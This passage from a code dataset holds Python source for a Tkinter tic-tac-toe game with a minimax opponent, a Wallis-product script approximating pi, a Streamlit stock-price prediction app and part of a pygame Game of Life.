CharPrompt.BUTTON_SIZE, width = CharPrompt.BUTTON_SIZE)\n 
self.oframe.grid_propagate(0)\n self.oframe.grid_rowconfigure(0, weight = 1)\n self.oframe.grid_columnconfigure(0, weight = 1)\n self.obtn = Button(\n self.oframe, text = App.O, font = CharPrompt.BTN_FONT, command = self.chooseO)\n self.oframe.grid(row = 1, column = 1)\n self.obtn.grid(sticky = NSEW)\n # To store the selected character (stays \"\" if user closes window without choosing)\n self.selected = \"\"\n \n def chooseX(self):\n self.selected = App.X\n self.destroy()\n\n def chooseO(self):\n self.selected = App.O\n self.destroy()\n\n def get_result(self) -> str:\n return self.selected\n\n\nclass EndPrompt(Toplevel):\n\n ''' Toplevel showing the result of the game, with options to quit or restart '''\n\n TITLE = \"Game over\"\n WIN = \"You won!\"\n LOSS = \"You lost!\"\n DRAW = \"A draw!\"\n RESTART = \"Restart\"\n QUIT = \"Quit\"\n BTN_FONT = (\"Calibri\", 16)\n BTN_WIDTH = 8\n LBL_FONT = (\"Calibri\", 16)\n RESIZABLE = False\n\n def __init__(self, master : Misc, result : str):\n super().__init__(master)\n self.title(EndPrompt.TITLE)\n self.resizable(width = EndPrompt.RESIZABLE, height = EndPrompt.RESIZABLE)\n # Label\n self.label = Label(self, text = result, font = EndPrompt.LBL_FONT)\n self.label.grid(row = 0, columnspan = 2, sticky = NSEW)\n # Restart button\n self.restart_btn = Button(\n self, text = EndPrompt.RESTART, width = EndPrompt.BTN_WIDTH, \n font = EndPrompt.BTN_FONT, command = self.choose_restart)\n self.restart_btn.grid(row = 1, column = 0, sticky = NSEW)\n # Quit button\n self.quit_btn = Button(\n self, text = EndPrompt.QUIT, width = EndPrompt.BTN_WIDTH, \n font = EndPrompt.BTN_FONT, command = self.choose_quit)\n self.quit_btn.grid(row = 1, column = 1, sticky = NSEW)\n # User wants to restart?\n self.restart = False\n\n def choose_quit(self):\n self.destroy()\n \n def choose_restart(self):\n self.restart = True\n self.destroy()\n\n def get_result(self) -> str:\n return self.restart\n\n\nclass Tile(Frame):\n\n ''' Button, with parent frame to set size in pixels '''\n\n FONT = (\"Calibri\", 30)\n SIZE = 90\n BUTTON_RELIEF = SUNKEN\n \n def __init__(self, master : Misc, row : int, col : int):\n # Both the height and width (as it is square)\n super().__init__(master, height = Tile.SIZE, width = Tile.SIZE)\n self.button = Button(self, text = App.PLACEHOLDER, font = Tile.FONT, relief = Tile.BUTTON_RELIEF, command = self.on_press)\n self.isTaken = False\n # Position in the grid (where top-left is 0, 0)\n self.row = row\n self.col = col\n self.grid_propagate(0)\n self.grid_rowconfigure(0, weight = 1)\n self.grid_columnconfigure(0, weight = 1)\n self.button.grid(sticky = NSEW)\n\n def on_press(self):\n ''' Handle click event '''\n self.master.player_move(self.row, self.col)\n \n def set_char(self, char : str):\n ''' Occupy the tile with the given character '''\n self.char = char\n self.button.config(text = self.char)\n self.isTaken = True\n \n def disable(self):\n ''' Prevent tile from being selected by user '''\n self.button.config(state = \"disabled\")\n\n def enable(self):\n ''' Allow user to select tile '''\n self.button.config(state = \"active\")\n\n def is_taken(self) -> bool:\n ''' Check if tile is occupied '''\n return self.isTaken\n\n\nclass App(Tk):\n\n ''' Main application window '''\n\n RESIZABLE = False\n TITLE = \"Tic-Tac-Toe\"\n X = \"X\"\n O = \"O\"\n PLACEHOLDER = \"\"\n BOARD_SIZE = 3\n DRAW_STATE = \"DRAW\"\n\n def __init__(self):\n super().__init__()\n self.title(App.TITLE)\n self.resizable(width = App.RESIZABLE, height = App.RESIZABLE)\n # Key bindings to 
close window\n self.bind_all(\"\", self.on_close)\n self.bind_all(\"\", self.on_close)\n self.bind_all(\"\", self.on_close)\n self.bind_all(\"\", self.on_close)\n # Initialise board and get player to choose X or O\n self.new_game()\n \n def init_board(self):\n ''' Set the initial empty board state and create tiles '''\n self.board = [[] for i in range(App.BOARD_SIZE)]\n self.tiles = [[] for i in range(App.BOARD_SIZE)]\n for row in range(App.BOARD_SIZE):\n for col in range(App.BOARD_SIZE):\n tile = Tile(self, row, col)\n tile.grid(row = row, column = col)\n self.tiles[row].append(tile)\n self.board[row].append(App.PLACEHOLDER)\n\n def player_move(self, row : int, col : int):\n ''' Update the screen and board when user clicks on a tile '''\n tile = self.tiles[row][col]\n tile.set_char(self.player_char)\n self.make_move(row, col, self.player_char)\n self.disable_tiles()\n self.update()\n # Check whether end state reached\n result = self.check_board_state()\n if result == None:\n # Prompt AI to move if game is not over\n self.ai_move()\n else:\n self.endgame_prompt(result)\n\n def ai_move(self):\n ''' Find the best move via minimax then play it '''\n r, c = self.minimax()\n tile = self.tiles[r][c]\n tile.set_char(self.ai_char)\n self.make_move(r, c, self.ai_char)\n self.enable_tiles()\n # Check whether end state reached\n result = self.check_board_state()\n if result != None:\n self.endgame_prompt(result)\n\n def minimax(self, maximising : bool = True, depth : int = 1):\n ''' Find the optimal move for AI by recursion and evaluating end states '''\n # First check for end state\n result = self.check_board_state()\n if result == self.player_char:\n return -1\n elif result == self.ai_char:\n return 1\n elif result == App.DRAW_STATE:\n return 0\n \n # Get possible moves and play each one\n moves = self.get_moves()\n if maximising:\n # AI turn (wants the best score for the AI)\n best_score = -2\n for move in moves:\n r, c = move\n self.make_move(r, c, self.ai_char)\n score = self.minimax(maximising = (not maximising), depth = (depth + 1))\n self.undo_move(r, c)\n if score > best_score:\n best_score = score\n best_move = move\n # Can't be better\n if score == 1:\n break\n # If this is the original minimax call, ready to make the optimal move\n if depth == 1:\n # if best_score == 0:\n # os.system(\"cls\")\n # print(\"should be a draw\")\n # if best_score == 1:\n # os.system(\"cls\")\n # print(\"you will lose\")\n # if best_score == -1:\n # os.system(\"cls\")\n # print(\"you should win\")\n return best_move\n return best_score\n else:\n # Player turn (wants the worst score for the AI)\n worst_score = 2\n for move in moves:\n r, c = move\n self.make_move(r, c, self.player_char)\n score = self.minimax(maximising = (not maximising), depth = (depth + 1))\n self.undo_move(r, c)\n if score < worst_score:\n worst_score = score\n worst_move = move\n # Can't be worse\n if score == -1:\n break\n return worst_score\n\n def make_move(self, row : int, col : int, char : str):\n ''' Update board with a move '''\n self.board[row][col] = char\n\n def undo_move(self, row : int, col : int):\n ''' For use in minimax function '''\n self.board[row][col] = App.PLACEHOLDER\n\n def get_moves(self) -> list:\n ''' Returns list of tuples (row, col) '''\n moves = []\n for r in range(App.BOARD_SIZE):\n for c in range(App.BOARD_SIZE):\n char = self.board[r][c]\n if char == App.PLACEHOLDER:\n moves.append((r, c))\n return moves\n\n def check_board_state(self) -> str:\n ''' Check if board state is a win for player, win for AI, or a 
draw '''\n\n # Check rows\n for row in self.board:\n result = self.check_list(row)\n if result in (App.X, App.O):\n return result\n \n # Check columns\n for c in range(App.BOARD_SIZE):\n col = []\n for row in self.board:\n col.append(row[c])\n result = self.check_list(col)\n if result in (App.X, App.O):\n return result\n\n # Check diagonals\n diag1 = []\n diag2 = []\n for i in range(App.BOARD_SIZE):\n # Top-left to bottom-right\n diag1.append(self.board[i][i])\n # Top-right to bottom-left\n diag2.append(self.board[i][2-i])\n results = (self.check_list(diag1), self.check_list(diag2))\n # Check if either of the diagonals is full\n for result in results:\n if result in (App.X, App.O):\n return result\n\n # Check if board state is a draw (board will be full, and no win detected)\n filled = True\n for row in self.board:\n for x in row:\n if x == App.PLACEHOLDER:\n filled = False\n if filled:\n return App.DRAW_STATE\n\n def check_list(self, l : list) -> str:\n ''' Check for 3 in a row in the given list '''\n player_win = all(x == self.player_char for x in l)\n ai_win = all(x == self.ai_char for x in l)\n if player_win:\n return self.player_char\n elif ai_win:\n return self.ai_char\n else:\n return \"\"\n\n def disable_tiles(self):\n ''' Set all tile buttons to disabled state (while waiting for AI move) '''\n for row in range(App.BOARD_SIZE):\n for col in range(App.BOARD_SIZE):\n self.tiles[row][col].disable()\n\n def enable_tiles(self):\n ''' Set all unoccupied tiles to enabled state '''\n for row in range(App.BOARD_SIZE):\n for col in range(App.BOARD_SIZE):\n tile = self.tiles[row][col]\n if not tile.is_taken():\n tile.enable()\n\n def new_game(self):\n ''' Initialise board and choose player char to start a new game '''\n #os.system(\"cls\")\n # Initialise board\n self.init_board()\n # Determine whether to play with X or O\n self.prompt_player_char()\n\n def prompt_player_char(self):\n ''' Create a toplevel prompt and for user to choose X or O '''\n # Hide window and wait for player to choose X or O before redrawing\n self.withdraw()\n prompt = CharPrompt(self)\n prompt.wait_window()\n result = prompt.get_result()\n # If prompt was closed by user, result will not hold X or O\n if result not in (App.X, App.O):\n self.on_close()\n self.player_char = result\n self.ai_char = App.X if self.player_char == App.O else App.O\n self.wm_deiconify()\n\n def endgame_prompt(self, result : str):\n ''' Create toplevel prompt and wait for user input '''\n if result == App.DRAW_STATE:\n result = EndPrompt.DRAW\n elif result == self.player_char:\n result = EndPrompt.WIN\n else:\n result = EndPrompt.LOSS\n prompt = EndPrompt(self, result = result)\n prompt.wait_window()\n # Does player want to restart?\n restart = prompt.get_result()\n if restart == True:\n self.new_game()\n else:\n self.on_close()\n\n def on_close(self, event = None):\n ''' Exit application '''\n self.destroy()\n exit()\n\n\n\n\nif __name__ == \"__main__\":\n app = App()\n app.mainloop()\n\n","repo_name":"AshvinKooner/Tic-Tac-Toe","sub_path":"against_pc_oop_gui.pyw","file_name":"against_pc_oop_gui.pyw","file_ext":"pyw","file_size_in_byte":13675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"25463425878","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\n########################################################################\n# (C) Alexandre Casamayou-Boucau, Pascal Chauvin, Guillaume Connan #\n# #\n# Complément de l'ouvrage : #\n# Programmation en Python pour les 
mathématiques #\n# Publisher: Dunod - Collection: Sciences Sup #\n# ISBN-13: 978-2100738311 - License: GPLv2 #\n########################################################################\n\nfrom entier import *\nfrom rationnel import *\n\n#\n# Wallis product formula (approximation of the number pi)\n#\np = rationnel(entier(2))\nfor n in range(1, 20):\n\tp *= rationnel((2*n)**2, (2*n-1)*(2*n+1))\nprint(\"An approximation of the number pi is\", p)\nprint(float(p))\n\n","repo_name":"mba-tradelab/programmation_python_mathematiques","sub_path":"sources/ch06/entier_rationnel/entier_rationnel-3/Wallis.py","file_name":"Wallis.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5285811192","text":"import math\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nimport streamlit as st\r\nfrom keras.models import load_model\r\nfrom sklearn.preprocessing import MinMaxScaler\r\n\r\nAAPL = \"AAPL Historical Data.csv\"\r\nAMZN = \"AMZN Historical Data.csv\"\r\nFB = \"FB Historical Data.csv\"\r\nGOOG = \"GOOG Historical Data.csv\"\r\nGOOGL = \"GOOGL Historical Data.csv\"\r\nMSFT = \"MSFT.csv\"\r\nNFLX = \"NFLX Historical Data.csv\"\r\n\r\nst.title('Your tool for stock trading')\r\nuser_input = st.text_input('Enter MSFT.csv, AAPL Historical Data.csv, AMZN Historical Data.csv, FB Historical Data.csv, GOOG Historical Data.csv, GOOGL Historical Data.csv, NFLX Historical Data.csv : ')\r\ndf = pd.read_csv(user_input)\r\ndf = df.set_index(pd.DatetimeIndex(df['Date'].values))\r\n\r\n# Describing data\r\nst.write(df.describe())\r\n\r\n# Visualization\r\nst.subheader('Closing price Vs Time chart')\r\nfig = plt.figure(figsize=(12,6))\r\nplt.plot(df.Close)\r\nst.pyplot(fig) \r\n\r\n# Create a new dataframe with close column\r\ndata = df.filter(['Close']) \r\n#convert dataframe to a numpy array\r\ndataset = data.values\r\n#Get the number of rows to train the model on\r\ntraining_data_len = math.ceil(len(dataset) * 0.8)\r\n\r\n#Scale the data\r\nscaler = MinMaxScaler(feature_range=(0,1))\r\nscaled_data = scaler.fit_transform(dataset)\r\n\r\n\r\n# load model\r\nmodel = load_model('keras_model.h5')\r\n\r\ntest_data=scaled_data[training_data_len-60:,:]\r\n#create x_test and y_test\r\nx_test=[]\r\ny_test=dataset[training_data_len:,:]\r\nfor i in range(60,len(test_data)):\r\n x_test.append(test_data[i-60:i,0])\r\n\r\n\r\n#Convert data into numpy array\r\nx_test=np.array(x_test)\r\n#Reshape the data\r\nx_test=np.reshape(x_test,(x_test.shape[0],x_test.shape[1],1))\r\n\r\n#Getting the model's predicted values\r\npredictions=model.predict(x_test)\r\npredictions=scaler.inverse_transform(predictions)\r\n\r\n\r\n\r\n\r\n\r\n\r\n# Plot the data\r\ntrain = data[:training_data_len]\r\nvalid = data[training_data_len:]\r\nvalid['Predictions']=predictions\r\n#visualize the data\r\nst.subheader(\"Predictions Vs Original\")\r\nfig1 = plt.figure(figsize=(16,8))\r\nplt.title('Predictions Vs Original')\r\nplt.xlabel('Date',fontsize=18)\r\nplt.ylabel('Close Price ($)',fontsize=18)\r\nplt.plot(train['Close'])\r\nplt.plot(valid[['Close','Predictions']])\r\nplt.legend(['Train','val','Predictions'],loc='lower right')\r\nst.pyplot(fig1)\r\n\r\nnew_df = pd.read_csv(user_input)\r\nnew_df = new_df.filter(['Close'])\r\nlast_60_days = new_df[-60:].values\r\n# Scale the data to be values between 0 and 1\r\nlast_60_days_scaled = scaler.transform(last_60_days)\r\n# create an empty list\r\nX_test = []\r\n# append the past 60 
days\r\nX_test.append(last_60_days_scaled)\r\n# convert the X_test dataset to a numpy\r\nX_test = np.array(X_test)\r\n# reshape the data\r\nX_test = np.reshape(X_test,(X_test.shape[0], X_test.shape[1],1))\r\n# get the predicted scaled price\r\npred_price = model.predict(X_test)\r\n#undo the scaling\r\npred_price = scaler.inverse_transform(pred_price)\r\nst.write(\"The predicted price is \")\r\nst.write(pred_price)\r\n","repo_name":"benzionh/stock-price-prediction","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"43802016604","text":"import pygame\nimport config\nimport math as maths\nimport time\nimport copy\n\nFont = config.Font\nDead = 0\nSquare = 1\n\n\nclass Player:\n def __init__(self, number, colour, starting_turns):\n self.Number = number\n self.Colour = colour\n self.NoOfCells = 0\n self.SpareTurns = starting_turns\n\n\nclass Menu:\n def __init__(self):\n self.ButtonHeight = config.M_ButtonHeight\n self.ButtonWidth = config.M_ButtonWidth\n self.ButtonBorder = config.M_ButtonBorder\n self.ButtonGapSize = config.M_ButtonGapSize\n self.SideGapSize = config.M_SideGapSize\n self.TextSize = config.M_TextSize\n self.TitleGapSize = config.M_TitleGapSize\n self.TitleTextSize = config.M_TitleTextSize\n self.Buttons = (\"Simulator\", \"2-Player Game\", \"Help\", \"Quit\")\n self.Colour = config.M_Colour\n \n def get_choice(self, screen):\n pygame.display.set_caption(\"Game of Life - Main Menu\")\n pygame.display.set_mode((2 * self.SideGapSize + self.ButtonWidth,\n 2 * self.TitleGapSize + len(self.Buttons)\n * (self.ButtonHeight + self.ButtonGapSize)))\n screen.fill(self.Colour[\"Background\"])\n fps_limiter = pygame.time.Clock() # Limits the FPS, as a high frame rate here is pointless\n buttons = [[screen.get_width() // 2, 2 * self.TitleGapSize\n + a * (self.ButtonHeight + self.ButtonGapSize) + self.TitleTextSize,\n self.Buttons[a], self.Colour[\"Text\"]] for a in range(len(self.Buttons))]\n for a in range(len(self.Buttons)):\n # Draws a rectangle the same colour as the background in a border-coloured rectangle\n pygame.draw.rect(screen, self.Colour[\"Border\"],\n (buttons[a][0] - self.ButtonWidth // 2,\n buttons[a][1] - self.ButtonHeight // 2,\n self.ButtonWidth, self.ButtonHeight))\n pygame.draw.rect(screen, self.Colour[\"Background\"],\n ((buttons[a][0] - self.ButtonWidth // 2 + self.ButtonBorder,\n buttons[a][1] - self.ButtonHeight // 2 + self.ButtonBorder,\n self.ButtonWidth - self.ButtonBorder * 2,\n self.ButtonHeight - self.ButtonBorder * 2)))\n \n write(screen, screen.get_width() // 2, self.TitleGapSize, \"Main Menu\", self.Colour[\"Text\"],\n self.TitleTextSize, alignment=(\"centre\", \"centre\")) # Writes the title\n \n while True:\n if check_quit(pygame.event.get()):\n quit_game()\n x, y = pygame.mouse.get_pos()\n for a in range(len(self.Buttons)):\n buttons[a][3] = self.Colour[\"Text\"] # Resets the colour of all buttons\n width = screen.get_width()\n if width / 2 - self.ButtonWidth / 2 < x < width / 2 + self.ButtonWidth / 2:\n for a in range(len(self.Buttons)):\n height = buttons[a][1]\n if height - self.ButtonHeight / 2 < y < height + self.ButtonHeight / 2:\n if pygame.mouse.get_pressed()[0]:\n return buttons[a][2]\n buttons[a][3] = self.Colour[\"Hover\"] # Changes the colour of the button\n for a in range(len(self.Buttons)): # if it's being hovered over\n write(screen, screen.get_width() // 2, buttons[a][1], buttons[a][2], 
buttons[a][3],\n self.TextSize, alignment=(\"centre\", \"centre\")) # Writes on the buttons\n pygame.display.update()\n fps_limiter.tick(config.FPS) # Limits to a certain FPS\n\n\nclass Sim:\n \"\"\"Change these values to change how the game looks and behaves in Simulator mode.\"\"\"\n \n def __init__(self):\n self.Width = config.S_Width\n self.Height = config.S_Height\n self.Size = config.S_Size\n self.CellGap = config.S_CellGap\n self.Wrap = config.S_Wrap\n self.Cushion = config.S_Cushion\n self.PreviewSize = 0\n self.SetUpChances = config.S_SetUpChances\n self.SliderSize = config.S_SliderSize\n self.HighlightSize = config.S_HighlightSize\n self.NoOfNotches = config.S_NoOfNotches\n self.NotchLength = config.S_NotchLength\n self.StartOfSlider = 2 * self.NotchLength\n self.SpeedSize = config.S_SpeedSize\n self.EndOfSlider = self.Height * self.Size - self.HighlightSize - self.NotchLength\n self.SpaceBetweenNotches = (self.EndOfSlider - self.StartOfSlider) / (self.NoOfNotches - 1)\n self.SliderY = self.Size * self.Width + self.CellGap // 2 + self.SliderSize // 2\n self.ButtonStart = self.Size * self.Width\n self.GPS = config.S_GPS\n self.TopGPS = config.S_TopGPS\n self.BottomGPS = config.S_BottomGPS\n self.GPSIsLimited = True\n self.Paused = True\n self.OneTurn = False\n self.HeldDown = {\"space\": True, # This is used to keep track of whether a button has just\n \"right\": True, # been pressed or was held down during the last check too.\n \"number\": True,\n \"f\": True}\n self.Colour = config.S_Colour\n \n def run(self, screen, board):\n \"\"\"Runs the simulation\"\"\"\n pygame.display.set_caption(\"Game of Life\")\n pygame.display.set_mode((board.Size * board.Width + self.SliderSize,\n board.Size * board.Height))\n screen.fill(self.Colour[\"Background\"])\n self.draw_gps_slider(screen, ((maths.log(self.GPS, 10) + 1) // -3)\n * (self.EndOfSlider - self.StartOfSlider) + self.EndOfSlider,\n self.GPSIsLimited, board)\n last_frame = time.time()\n board.update()\n board.draw(screen)\n \n while not self.check_user_input(screen, board):\n board.update()\n if (not self.Paused\n and (not self.GPSIsLimited or time.time() - last_frame > 1 / self.GPS))\\\n or (self.Paused and self.OneTurn): # If the board should be updated\n if self.OneTurn:\n self.OneTurn = False\n board.take_turn(update_caption=True)\n board.update()\n board.Generations += 1\n board.draw(screen)\n last_frame = time.time() # Stores the time the screen was updated to limit the GPS\n \n def check_user_input(self, screen, board):\n \"\"\"Checks for user input and acts accordingly\"\"\"\n \n go_back = check_quit(pygame.event.get()) # Whether the player tried to quit to the menu\n x, y = pygame.mouse.get_pos()\n a, b = board.get_square(x, y)\n if pygame.key.get_pressed()[pygame.K_SPACE] and not self.HeldDown[\"space\"]:\n self.Paused = not self.Paused\n if pygame.key.get_pressed()[pygame.K_f] and not self.HeldDown[\"f\"]:\n self.GPSIsLimited = not self.GPSIsLimited\n bottom_gps_log = maths.log(self.BottomGPS, self.TopGPS)\n self.draw_gps_slider(screen, self.EndOfSlider\n - ((maths.log(self.GPS, self.TopGPS) - bottom_gps_log)\n * (self.EndOfSlider - self.StartOfSlider))\n // (1 - bottom_gps_log), self.GPSIsLimited, board)\n if pygame.key.get_pressed()[pygame.K_RIGHT] and not self.HeldDown[\"right\"]:\n self.OneTurn = True\n else:\n self.OneTurn = False\n if pygame.key.get_pressed()[pygame.K_RETURN]:\n board.reset(self)\n board.draw(screen)\n self.Paused = True\n if pygame.mouse.get_pressed()[0]:\n if board.Size * board.Width + 
board.CellGap / 2 < x < (\n board.Size * board.Width) + self.SliderSize + board.CellGap / 2:\n if y < self.StartOfSlider: # Doesn't allow the player to drag the slider out of\n y = self.StartOfSlider # the area where it should be (ie. off the screen)\n elif y > self.EndOfSlider:\n y = self.EndOfSlider\n self.GPSIsLimited = True\n self.draw_gps_slider(screen, y, self.GPSIsLimited, board)\n bottom_gps_log = maths.log(self.BottomGPS, self.TopGPS)\n self.GPS = self.TopGPS ** (((1 - bottom_gps_log) * (self.EndOfSlider - y)\n / (self.EndOfSlider - self.StartOfSlider)) + bottom_gps_log)\n elif 0 <= a < board.Width + board.Cushion and 0 <= b < board.Height + board.Cushion:\n board.Cell[a][b].birth(Square, 0) # checks the mouse is over the board so as to\n board.update() # avoid trying to change a cell where none exists\n board.draw(screen)\n if pygame.mouse.get_pressed()[2] and 0 <= a < board.Width\\\n + board.Cushion and 0 <= b < board.Height + board.Cushion:\n board.Cell[a][b].kill()\n board.update()\n board.draw(screen)\n number_pressed = False\n for key in range(pygame.K_1, pygame.K_9):\n if pygame.key.get_pressed()[key]:\n if not self.HeldDown[\"number\"]:\n board.place_preset(screen, int(pygame.key.name(key)), a, b)\n number_pressed = True\n self.HeldDown[\"number\"] = number_pressed\n for key in ((\"space\", \"SPACE\"), (\"f\", \"f\"), (\"right\", \"RIGHT\")):\n self.HeldDown[key[0]] = eval(\"pygame.key.get_pressed()[pygame.K_%s]\" % key[1])\n \n return go_back\n \n def draw_gps_slider(self, screen, y, gps_limit, board):\n \"\"\"Draws the slider with the y coordinate of the button click\n (How many GPS this corresponds to is not dealt with here.)\"\"\"\n pygame.draw.rect(screen, self.Colour[\"Background\"], # Erases the last drawing of of the\n ((self.ButtonStart, self.StartOfSlider - self.NotchLength), # slider\n (self.ButtonStart + board.CellGap + self.HighlightSize + self.SliderSize,\n self.EndOfSlider)))\n pygame.draw.line(screen, self.Colour[\"Text\"], (self.SliderY, self.StartOfSlider),\n (self.SliderY, self.EndOfSlider))\n for n in range(self.NoOfNotches): # Draws the notches\n pygame.draw.line(screen, self.Colour[\"Text\"],\n (self.SliderY - self.NotchLength // 2,\n self.StartOfSlider + int(n * self.SpaceBetweenNotches)),\n (self.SliderY + self.NotchLength // 2,\n self.StartOfSlider + int(n * self.SpaceBetweenNotches)))\n write(screen, (self.Size * self.Width + self.SliderY - self.NotchLength) // 2,\n (self.StartOfSlider + self.EndOfSlider) // 2, \"Speed\", self.Colour[\"Text\"],\n self.SpeedSize, rotate=90, alignment=(\"centre\", \"centre\"))\n if gps_limit: # Gets te correct colour for the pointer\n colour = \"Highlighter\"\n else:\n colour = \"Unselected\"\n pygame.draw.polygon(screen, self.Colour[colour], # Draws the pointer\n ((self.SliderY + self.NotchLength // 2, y),\n (self.SliderY + self.NotchLength, y - self.NotchLength // 2),\n (self.SliderY + 2 * self.NotchLength, y - self.NotchLength // 2),\n (self.SliderY + 2 * self.NotchLength, y + self.NotchLength // 2),\n (self.SliderY + self.NotchLength, y + self.NotchLength // 2)))\n pygame.display.update()\n\n\nclass Game:\n def __init__(self):\n self.Width = config.G_Width\n self.Height = config.G_Height\n self.Size = config.G_Size\n self.CellGap = config.G_CellGap\n self.Wrap = True\n self.Cushion = 0\n self.Turns = 0\n self.Gens = 0\n self.NoOfPlayers = config.G_NoOfPlayers\n self.PlayerNames = config.G_PlayerNames[:self.NoOfPlayers]\n self.PreviewSize = config.G_PreviewSize\n self.SetUpChances = 
config.G_SetUpChances[:self.NoOfPlayers + 1]\n self.TextSize = config.G_TextSize\n self.RightColumnSize = config.G_RightColumnSize\n self.ButtonHeight = config.G_ButtonHeight\n self.ButtonBorderSize = config.G_ButtonBorderSize\n self.WinMessageWidth = config.G_WinMessageWidth\n self.WinMessageHeight = config.G_WinMessageHeight\n self.PartImmune = config.G_PartImmune\n self.PartImmuneTime = config.G_PartImmuneTime\n self.PartImmuneKill = config.G_PartImmuneKill\n self.FullImmune = config.G_FullImmune\n self.FullImmuneTime = config.G_FullImmuneTime\n self.FullImmuneKill = config.G_FullImmuneKill\n self.Colour = config.G_Colour\n self.CurrentPlayer = 1\n self.IsTurnLimit = config.G_IsTurnLimit\n self.TurnLimit = config.G_TurnLimit\n self.IsGenLimit = config.G_IsGenLimit\n self.GenLimit = config.G_GenLimit\n self.BoardAmountWin = config.G_BoardAmountWin\n self.BoardAmount = config.G_BoardAmount\n self.PlayerAmountWin = config.G_PlayerAmountWin\n self.PlayerAmount = config.G_PlayerAmount\n self.StartingTurns = config.G_StartingTurns\n self.FairerTurns = config.G_FairerTurns\n self.Started = False\n self.TurnsPerRound = config.G_TurnsPerRound\n self.Players = [Player(n, self.Colour[\"Player\" + str(n)], self.StartingTurns)\n for n in range(1, self.NoOfPlayers + 1)]\n \n def run(self, screen, board):\n \"\"\"Runs the game\"\"\"\n board.update()\n board.draw(screen)\n screen = pygame.display.set_mode((board.Size * board.Width + self.RightColumnSize,\n board.Size * board.Height))\n screen.fill(self.Colour[\"Background\"])\n fps_limiter = pygame.time.Clock()\n if not self.Started: # Sets up the game if it has not already ben started\n self.Started = True\n if self.FairerTurns:\n for p in range(self.NoOfPlayers // 2):\n self.Players[p].SpareTurns -= self.TurnsPerRound // 2\n while True:\n caption = \" - Generations: \" + str(self.Gens) # Adds info into the caption if it is needed\n if self.IsGenLimit:\n caption += \", (%s)\" % str(self.GenLimit)\n caption += \", Turns: \" + str(self.Turns)\n if self.IsTurnLimit:\n caption += \" (%s)\" % str(self.TurnLimit)\n if self.BoardAmountWin:\n caption += \", Cells needed to win: \" + str(maths.floor(self.BoardAmount\n * self.Width * self.Height))\n if self.PartImmune:\n caption += \", Part Immune after %s Turns\" % str(self.PartImmuneTime)\n if self.FullImmune:\n caption += \", Fully Immune after %s Turns\" % str(self.FullImmuneTime)\n pygame.display.set_caption(\"Game of Life - Game\" + caption)\n player_scores = self.get_player_scores(board)\n for p in range(self.NoOfPlayers):\n self.Players[p].NoOfCells = player_scores[p + 1]\n self.Players[self.CurrentPlayer - 1].SpareTurns += self.TurnsPerRound # Gives current\n turn = self.take_turn(screen, board, self.CurrentPlayer) # player their extra turns\n if turn == \"Go Back\":\n self.Players[self.CurrentPlayer - 1].SpareTurns -= self.TurnsPerRound\n return False # The game has not ended (no-one won) so False is returned and player\n else: # loses those turns as they are given back when game is resumed\n board.impose_turns(turn, self.CurrentPlayer)\n self.Players[self.CurrentPlayer - 1].SpareTurns -= len(turn[1])\n screen.fill(self.Colour[\"Background\"])\n board.draw(screen)\n if turn[0] is not None:\n self.Gens += 1\n if self.CurrentPlayer == self.NoOfPlayers:\n self.CurrentPlayer = 1\n self.Turns += 1\n else:\n self.CurrentPlayer += 1\n win = self.check_for_wins(board, self.Turns, self.Gens)\n fps_limiter.tick(config.FPS)\n if win is not None: # If someone won\n if win[0].startswith(\"T\"):\n win_message = 
\"Turn limit reached.Player \" + str(win[1]) + \" wins!\"\n elif win[0].startswith(\"G\"):\n win_message = \"Generation limit reached.Player \" + str(win[1]) + \" wins!\"\n elif win[0].startswith(\"S\"):\n win_message = \"Player \" + str(win[1]) + \" got enough points to win!\"\n else:\n win_message = \"Player \" + str(win[1]) +\\\n \" got more cells than the other player by enough to win\"\n pygame.draw.rect(screen, (self.Colour[\"Highlighter\"]), # Draws the frame\n ((screen.get_width() - self.WinMessageWidth)\n // 2 - self.ButtonBorderSize,\n (screen.get_height() - self.WinMessageHeight)\n // 2 - self.ButtonBorderSize,\n self.WinMessageWidth + 2 * self.ButtonBorderSize,\n self.WinMessageHeight + 2 * self.ButtonBorderSize))\n pygame.draw.rect(screen, (self.Colour[\"Background\"]), # Draws the background\n ((screen.get_width() - self.WinMessageWidth) // 2,\n (screen.get_height() - self.WinMessageHeight) // 2,\n self.WinMessageWidth, self.WinMessageHeight))\n write(screen, screen.get_width() // 2, screen.get_height() // 2, win_message,\n self.Colour[\"Text\"], self.TextSize, max_len=self.WinMessageWidth,\n alignment=(\"centre\", \"centre\")) # Writes the win message\n pygame.display.update()\n board_view = False # when ESC is pressed the win message should disappear and\n while True: # the board should be displayed again\n if check_quit(pygame.event.get()): # if ESC is pressed - first press displays\n if board_view: # the board, the second goes back to the main menu\n self.Started = False\n return True\n else:\n board_view = True\n screen.fill(self.Colour[\"Background\"])\n board.draw(screen)\n self.draw_right_column(screen, self.get_player_scores(board),\n (False, False), (0, 0, 0, 0), 0, clickable=False)\n pygame.display.update()\n fps_limiter.tick(config.FPS)\n \n def take_turn(self, screen, board, player_no):\n \"\"\"returns the turn that the player wants to do\"\"\"\n board.draw(screen)\n turn = [None, []] # First value is where the Generation happens, if at all;\n turn_chosen = False # the second is a list containing info about the turns\n held_down = {\"mouse0\": True, \"mouse2\": False, \"esc\": False,\n \"space\": True, \"f\": False, \"j\": False}\n show_future = True\n show_alive_for = False\n turns_used = [0 for _ in range(self.NoOfPlayers)]\n fps_limiter = pygame.time.Clock()\n while not turn_chosen:\n events = pygame.event.get()\n if check_quit(events) and not held_down[\"esc\"]: # if ESC pressed but wasn't last turn\n if len(turn[1]) == 0 and turn[0] is None:\n return \"Go Back\"\n else:\n if turn[0] == len(turn[1]): # if the generation needs to be undone\n turn[0] = None\n else:\n t = turn[1][-1]\n del turn[1][-1] # Gives back the turns used to make the turn\n turns_used[player_no - 1]\\\n -= self.check_turn_is_valid(board, turn, player_no, t[0], t[1], t[2],\n self.FullImmuneKill)[1]\n held_down[\"esc\"] = True\n else:\n held_down[\"esc\"] = False\n x, y = pygame.mouse.get_pos()\n a, b = board.get_square(x, y)\n if 0 <= a < board.Width + 